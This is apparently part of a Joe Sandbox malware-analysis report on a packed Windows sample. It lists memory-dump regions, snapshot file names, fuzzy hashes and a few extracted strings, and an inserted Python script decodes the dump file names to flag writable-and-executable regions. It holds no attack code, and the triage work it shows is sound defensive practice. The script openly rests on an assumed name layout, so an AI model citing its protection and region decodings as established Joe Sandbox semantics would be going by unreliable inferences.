                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: UNC\
                                      • API String ID: 0-505053535
                                      • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction ID: 0f6f2da0eaae96f98cb5f27ee29da996232aaa9708b2e9c80454536739fa806e
                                      • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction Fuzzy Hash: 9BE11A71D042658EEF10CF59C8843BEBBE2AB85318F1D8169D4A46B292D775CD46CBB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 5;;
                                      • API String ID: 0-2482663352
                                      • Opcode ID: 7d08a50b8516302122a9d95bce803665571eb84045b0b0e82336645aab83827a
                                      • Instruction ID: 9c2e181944aa7f28b555bc8395977875fdc8258ec52fee7e8f40f2d1acc517ad
                                      • Opcode Fuzzy Hash: 7d08a50b8516302122a9d95bce803665571eb84045b0b0e82336645aab83827a
                                      • Instruction Fuzzy Hash: 1661AEB350C204AFE704AF19EC4167AF7E5EF94720F16892DEAC483740EA75A9108A97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: D.Fz
                                      • API String ID: 0-286395197
                                      • Opcode ID: ac167d50f6085da93700afe13bcf3073b03ff3a6d3777e2f9522b3e7094c944e
                                      • Instruction ID: 3a22ddba3f503e4a038a21168c071321591fe9af502d45eeeffb52567cba23e6
                                      • Opcode Fuzzy Hash: ac167d50f6085da93700afe13bcf3073b03ff3a6d3777e2f9522b3e7094c944e
                                      • Instruction Fuzzy Hash: 10413AF3A183056FE3086E79ECC5776B6C5E794324F294B3DFB94C2384E97988028652
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: X#]
                                      • API String ID: 0-3553717010
                                      • Opcode ID: f721f834ba86e696396ce33389fff5ff9ff4b3607fcefb25ab167f282ac39701
                                      • Instruction ID: 002083ec58bd7eae49ada2f6c6103616b7da6a9814a1fd88b40d1925f54ce4cc
                                      • Opcode Fuzzy Hash: f721f834ba86e696396ce33389fff5ff9ff4b3607fcefb25ab167f282ac39701
                                      • Instruction Fuzzy Hash: 954143F3E0442457E3089939EC1832AB6979BD4720F2F863EDE59A7788FC7A5D0582D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction ID: d52553af341fba4cbea8fee6bb518a45726fe5bd79a7b41e35153fcd8c82825e
                                      • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction Fuzzy Hash: F182E2B5900F448FD765CF29C880B92B7F1BF5A340F548A2ED9EA8B651DB30B549CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction ID: 2d953aee0905bcdb61fd47273eb8b1ea44499811a37fd9ed1d3e338fdd458538
                                      • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction Fuzzy Hash: 144281726047418FC725CF19C0A4665FBE2BF95314F28CA6ED4CE8B792E635E885CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction ID: eb68609d7e66452c0913ef107948f836480409a147eeffb0a78333cd8f801198
                                      • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction Fuzzy Hash: 6902E571E002168FDB11CF6DC8906BFB7E2AF9A354F15832AE855B7251D770AD8287E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                      • Instruction ID: acc444d8e5342dcab40c83f52ddb000dc402896f562206526c2a3b1ee7657b59
                                      • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                      • Instruction Fuzzy Hash: D702DD70A093058FDB15EF29C890269F7E1AFA5350F1C872DF8D99B352D731E8858B61
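The .sdmp names repeated for every function above encode where each dumped region sat in the process and with which page protection it was dumped. The parser below is an added example and is not part of the Joe Sandbox report or its tooling; the field layout, the reading of the fifth dotted field as a Windows PAGE_* protection constant and of the seventh as a MEM_* region type, are assumptions inferred from the names on this page. The embedded input is the dump set listed in the block above (the 0x00D30000 header region plus the 15 associated regions), so the script runs offline.

```python
"""Decode Joe Sandbox .sdmp memory-dump file names (added example, not Joe Sandbox code).

ASSUMED layout, inferred from the names in this report:
    <proc>.<stage>.<dump id>.<base address>.<protect>.<flag>.<type>.<seq>.sdmp
Only <base address>, <protect> and <type> are interpreted here. <protect> is assumed to
be a winnt.h PAGE_* constant and <type> a MEM_* region type; <flag> and <seq> are left
undecoded because the page gives no basis for reading them.
"""
import re
from collections import Counter
from dataclasses import dataclass

# winnt.h memory protection constants (exact values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flag>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.sdmp$"
)

# Constructed from the dump set listed in the report block above.
REPORT_SDMP_NAMES = [
    "00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp",
]


@dataclass(frozen=True)
class SdmpRegion:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        label = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")
        return label + ("|PAGE_GUARD" if self.protect & PAGE_GUARD else "")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def writable_and_executable(self) -> bool:
        # Pages an unpacker can both write a stage into and then execute.
        return (self.protect & 0xFF) in (0x40, 0x80)


def parse_sdmp_name(name: str) -> SdmpRegion:
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a .sdmp name: {name}")
    return SdmpRegion(name, int(m["base"], 16), int(m["protect"], 16), int(m["mtype"], 16))


def rwx_regions(names) -> list:
    """Regions whose (assumed) protection allows both write and execute, lowest base first."""
    return sorted((r for r in map(parse_sdmp_name, names) if r.writable_and_executable),
                  key=lambda r: r.base)


def protection_summary(names) -> dict:
    """Count of dumped regions per protection label."""
    return dict(Counter(parse_sdmp_name(n).protect_name for n in names))


if __name__ == "__main__":
    for r in sorted(map(parse_sdmp_name, REPORT_SDMP_NAMES), key=lambda r: r.base):
        print(f"{r.base:#010x}  {r.protect_name:<24} {r.type_name}")
    print(protection_summary(REPORT_SDMP_NAMES))
```

Under these assumptions, only the 0x00D30000 region (the PE header, given "Offset: 00D30000, based on PE: true") is plain read/write; every other dumped region is writable and executable, which is what the "Detected unpacking (changes PE section rights)" signature in the overview describes.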
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: the same 15 .sdmp regions (0x00D30000 through 0x0145A000) as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction ID: 4463da0be3602cba2e44e725865f6c4acb89fecf666d9ac9fa3977277308d97e
                                      • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction Fuzzy Hash: E4F16B6250C6914BC71D9A1884F08BD7FD29FAA201F0E85ADFDDB0F393E924DA05DB61
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: the same 15 .sdmp regions (0x00D30000 through 0x0145A000) as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction ID: 0ed47c80d8f606dd98e5c4fea389a59fe8a9172d1b0f507618d7ad7823ce5e82
                                      • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction Fuzzy Hash: 2ED17773F10A254BEB08CA99DC913ADB6E2EBD8350F19413ED916F7381DAF89D018790
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: the same 15 .sdmp regions (0x00D30000 through 0x0145A000) as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction ID: 5f4092bf244fdfeaa6650f50412972a381dd6b4c2cf6b9b49189e579eeb4b877
                                      • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction Fuzzy Hash: 11D1C572E002198FDF248F58D8947EDBBB1FF4A310F188229E95577291D73499468BA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: the same 15 .sdmp regions (0x00D30000 through 0x0145A000) as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction ID: cbbd14d5bad9cb5daf22bcf1cf3f2000ec9ee9da49b08fa2181d12e99af80c85
                                      • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction Fuzzy Hash: AC027B74E006598FCF16CFA8C4905EDBBB6FF8D310F58815AE8996B355C730AA51CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: the same 15 .sdmp regions (0x00D30000 through 0x0145A000) as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction ID: 07a619fe96d9306b9d5e141c286c6637c5c10b230a25b08d5f0feb69afffb63f
                                      • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction Fuzzy Hash: E0022475E00619CFCF15CF98C4809ADB7B6FF88350F258169E84AAB355D731AA91CFA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: the same 15 .sdmp regions (0x00D30000 through 0x0145A000) as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction ID: 7e35e649a7b3e17bdfd3738452d70691778bb54b33e110a8bc1c41f1ddc8334f
                                      • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction Fuzzy Hash: CCC16D76E29B824BD713873DD802265F395AFE7290F15D72FFCE472982FB2096818244
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: the same 15 .sdmp regions (0x00D30000 through 0x0145A000) as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction ID: 3daccbfd32c74e05a9eb824f209adc43fe462a37b932630f71d3a157131b409c
                                      • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction Fuzzy Hash: 67D13671600B40CFDB25CF29C594BA7B7E0FB49310F18892ED89A8BB51DB35E845CBA1
                                      Memory Dump Source
